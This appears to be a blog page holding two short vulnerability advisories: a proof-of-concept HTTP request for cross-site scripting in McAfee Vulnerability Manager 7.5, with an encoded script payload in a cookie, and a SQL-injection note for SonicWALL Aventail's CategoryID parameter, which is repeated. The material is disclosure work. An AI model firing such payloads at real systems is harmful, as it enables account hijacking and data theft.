http://www.securityfocus.com/bid/58401/info
http://www.tenable.com/plugins/index.php?view=single&id=65738
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5094
#Date- 8/3/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerbility
McAfee® Vulnerability Manager 7.5 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly
sanitize user-supplied input
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7; cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E; remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Wednesday, August 21, 2013
Sunday, March 10, 2013
SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability
SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Further research conducted by the vendor indicates this issue may not be a vulnerability affecting the application
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5262
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Further research conducted by the vendor indicates this issue may not be a vulnerability affecting the application
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5262
Subscribe to:
Posts (Atom)